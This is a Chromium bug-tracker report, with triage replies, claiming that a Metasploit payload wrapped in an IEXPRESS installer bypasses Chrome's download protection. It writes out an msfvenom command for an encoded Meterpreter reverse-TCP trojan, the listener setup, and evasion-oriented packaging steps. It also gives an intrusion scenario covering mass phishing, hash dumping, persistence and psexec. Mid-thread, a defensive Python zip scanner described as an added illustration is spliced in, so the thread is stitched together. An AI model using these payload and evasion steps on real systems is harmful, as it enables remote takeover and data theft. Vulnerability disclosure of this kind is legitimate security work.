Download Protection Bypass using Metasploit/iexpress
Reported by t.anonym...@gmail.com, Jul 2 2016
Issue description

Google Chrome Bug/Exploit report

This is a download protection bypass

DATE: 7/1/16
CHROME VERSION: 51.0.2704.106 m (64-bit) stable (Exploit should work with all Chrome versions)
OS: Kali Linux 2.0/Windows 10 Home 64-bit

EXPLOIT SUMMARY

This exploit bypasses the Google Chrome Download Protection. It does not bypass the Google Drive download protection (in its current state). This exploit is also commonly caught during launch by common anti-virus programs. If the virus is launched on the target machine, the attacker will be able to gain a Meterpreter reverse TCP shell for remote command execution. This exploit was built in Kali Linux using the Metasploit Framework developed by Rapid7. This virus is classified as a trojan virus. It will only work on systems of x86 and x64 architecture on Windows systems. The virus was built using msfvenom; the exact command used was (Linux):

root@kali:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 -e x86/shikata_ga_nai -i 9 -f exe > /root/Desktop/programname.exe

This generated an executable file for Windows x86 encoded with shikata ga nai, a very powerful and commonly used payload encoder, using 9 iterations, meaning the payload was encoded 9 times. This payload was then put on a Windows system and, using IEXPRESS, a built-in Windows program, I was able to put the payload, along with several dummy files, in a typical Windows installer in executable format. After being put in a zip file to evade further detection, the file could be uploaded to a file sharing site; I specifically used MediaFire. Google Drive could also be used if the size of the payload was increased above 25 MB. This would make the file too large for Google Drive's antivirus scanners to pick up on it. This file will not be discovered by antivirus (excluding Google Drive's) until the program is run.

At this point the program would have already downloaded, bypassing Google Chrome's built-in antivirus scanner. If the victim is not using antivirus, or is using one that can be evaded using Shikata ga nai, the program will extract and run automatically, opening the reverse shell instantly on the attacker's machine. Through this Meterpreter shell, the attacker can grab major pieces of information such as all the password hashes of the SAM file, gain access to webcams, enable RDP ports, run persistence, kill antivirus, run keyloggers, and grab tons of information.

HOW IT WORKS

This exploit is able to avoid Chrome's download protection in two direct ways. First off, the virus is encoded, adding another step for AV; this step doesn't have a major effect on the exploit. This exploit also works due to the way the exe is packaged and compressed. Several copies of the exploit are packaged into an executable. This means the direct executable files are not immediately available to a browser such as Chrome or any antivirus. Furthermore, by putting some dummy files in the package, antivirus programs will be even less suspicious of the trojan. Once the package is completed using IEXPRESS, the program is put into a zip file to make it smaller (a quicker download/more steps for AV). From there it can be uploaded to file sharing sites and downloaded to a victim.

POSSIBLE FIXES

First off, I am no software engineer, but from what I know about hacking, here are some suggestions to help stop this simple bypass. Since it is all packaged, Chrome's download protection should unzip the file, then sandbox the executable; during the sandbox, Chrome's anti-malware should unpackage the executable, then scan each individual file that was in the package. Currently, I think Chrome's download protection will just scan the installer, or package of executables, meaning the infected content within is not scanned.

SCENARIO

This is a scenario to represent the simplicity and effectiveness of this vulnerability to a hacker. Hi, I am Bob, and I want to gain full access to somebody's computer system. I will go into my Kali Linux computer and quickly create a payload and listener in Metasploit (takes about 2 mins). From there, I will bring the payload over to my Windows computer, then get some dummy files and make a packaged executable with all the files. Now I'll compress it and I'm ready to start. I'll run Maltego and Company Stalker to gain all the email addresses associated with a domain or company. From there I'll run a mass mailer to send out an email with the payload attached, using good social engineering; eventually one of the company staffers will run the file, therefore providing me full access. Now on my Kali machine, I have a listener set up and I'm waiting for my connection. Boom, now I've gotten a Meterpreter shell for remote command execution. The first things I'll do are migrate the shell to notepad, run persistence, and grab password hashes. This way I'll be quieter, have all the password hashes, and persistence. I could quickly run the hashes through a rainbow table (since they are in lm:ntlm form) and get the passwords in a day or two. Then I could easily launch more payloads by going to the company's area with all of the passwords. I would then use psexec, a PowerShell login, and be able to gain any information I wanted. Then I could either sell this information to a black hat or use it to steal from the company. (I wouldn't do this, Bob would)

PROBLEMS WITH MALWARE

-On Windows operating systems with SmartScreen filter, this program will be flagged as an unrecognized application, thus requiring the user to apply administrative permissions. This can be avoided with some smart social engineering.
-From the testing I have done, this exploit will not work on 32-bit systems.
-There is currently no Mac version

EXACT STEPS FOR EXPLOIT REPRODUCTION

In Kali Linux 2.0 64-bit

-create the payload
*launch shell window
root@kali:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.16(your local ip) LPORT=4444(the listening port) -e x86/shikata_ga_nai -i 9 -f exe > /root/Desktop/chrome_exploit.exe
-set up the listener
*new shell window
root@kali:msfconsole
msfconsole:use multi/handler
msfconsole: exploit(multi)set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msfconsole: exploit(multi)set lport 4444
lport => 4444
msfconsole: exploit(multi)set lhost 192.168.1.16
lhost => 192.168.1.16
msfconsole: exploit(multi)run
-transfer the file
*use a USB drive or the internet to put the payload on a Windows system

In Windows 10 64-bit Home version

-get files ready
*put the payload generated in Kali on the Windows system
*get dummy files from anything (optional, to evade Google Drive's scanner)
*get 3 copies of the payload
-prepare package
*run iexpress
*create new self extraction directive file
*extract files and run an installation command
*set package title to whatever is wanted
*No prompt
*Do not display a license
*add the dummy files, and all 3 copies of the payload
*set install program to one copy of payload *note* the install program is going to be specifically used later
*set post install command to a different copy of the payload
*set show window to hidden
*set display message to something like "Thanks for downloading"
*set the target path to the same file I noted earlier *note* also choose hide file extraction progress animation from user
*choose not restart
*don't save an SED
*click next and create the package
-compression/uploading the package
*using a compression application such as WinZip, put the previously noted copy of the payload into a folder, then compress the folder to zip format.
*upload this zipped folder to any file sharing site; if it's bigger than 25 MB, Google Drive can be used.
*download the file on a target machine anywhere connected to the internet.
*once the file is run, the listener in Kali will send a stage, then a Meterpreter shell is opened

SAMPLE

-I created a sample website using Weebly to show how this can be exploited, and using social engineering, one can be easily convinced to download and run the files.
-The website is www.newsolutionsinc.weebly.com.
-On the download page there are several different versions of the payload.
-There is no listener active for these payloads so there is no harm in running them.
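The fix the reporter proposes under POSSIBLE FIXES is that a download scanner should open the container and look at each file inside it rather than judging the outer archive alone. The following is an added illustration of that defender-side check, written for this page and not taken from the report or from Chromium: it walks a zip archive, descends into nested zips up to a depth limit, and flags every member that carries a Windows PE header (an "MZ" DOS stub whose e_lfanew offset points at the "PE\0\0" signature), regardless of the member's file extension. The sample archive and the minimal PE header it contains are constructed in memory and are not real programs. It handles only zip containers; unpacking a self-extracting installer executable such as an IEXPRESS package would need a separate extractor.

```python
"""Recursive zip inspection that flags PE executables, including ones nested in inner zips.

Added example for this bug report; the sample data below is constructed, not captured.
"""
import io
import struct
import zipfile

MAX_MEMBER_BYTES = 50 * 1024 * 1024  # skip members larger than this to avoid decompression bombs


def is_pe(data: bytes) -> bool:
    """Return True if data starts with an MZ header whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def find_executables(zip_bytes: bytes, prefix: str = "", max_depth: int = 5) -> list:
    """Return archive-relative paths of all PE members, descending into nested zip members.

    Nested paths use 'outer.zip!/inner/path' notation (a convention chosen for this example).
    """
    findings = []
    if max_depth < 0:
        return findings
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir() or info.file_size > MAX_MEMBER_BYTES:
                continue
            data = zf.read(info)
            path = prefix + info.filename
            if is_pe(data):
                findings.append(path)
            elif data[:4] == b"PK\x03\x04":  # local file header: the member is itself a zip
                findings.extend(find_executables(data, path + "!/", max_depth - 1))
    return findings


def fake_pe() -> bytes:
    """Construct a minimal byte string that satisfies is_pe(); it contains no executable code."""
    header = bytearray(0x80)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x40)  # e_lfanew -> offset 0x40
    header[0x40:0x44] = b"PE\x00\x00"
    return bytes(header)


def build_sample_zip() -> bytes:
    """Construct the sample: a readme and a dummy text file alongside an inner zip holding the fake PE."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr("setup/installer.exe", fake_pe())
        zf.writestr("setup/notes.txt", "dummy file")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as zf:
        zf.writestr("README.txt", "Thanks for downloading")
        zf.writestr("package.zip", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    for path in find_executables(build_sample_zip()):
        print("executable found:", path)
```

Two design points matter for a scanner like this: the depth limit and the per-member size cap bound the work an attacker-controlled archive can force, and the decision is made on file content (the PE header) rather than on the extension, so renaming a member does not hide it.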
Jul 15 2016
Thanks for reporting this issue. I took a look at one of the downloads from the website you mentioned in the description and when I downloaded Minecrafted.zip, Chrome inspected it and deemed it safe. The counter #10 at chrome://histograms/SBClientDownload.CheckDownloadStats gets incremented. According to the rules of the download protection VRP, this report does not qualify for a reward: The download should not send a Download Protection Ping back to Safe Browsing. Download Protection Pings can be measured by checking increments to counters at chrome://histograms/SBClientDownload.CheckDownloadStats. If a counter increments, a check was successfully sent (with exception to counter #7, which counts checks that were not sent). Source: https://www.google.com/about/appsecurity/chrome-rewards/index.html If you have/can craft a different PoC that demonstrates Chrome allowing downloads of an otherwise unsafe executable file, please re-open the bug. Thanks.
Mar 10 2017
For all Download Protection VRP bugs: removing label Restrict-View-Google and adding Restrict-View-SecurityTeam instead.
Mar 11 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot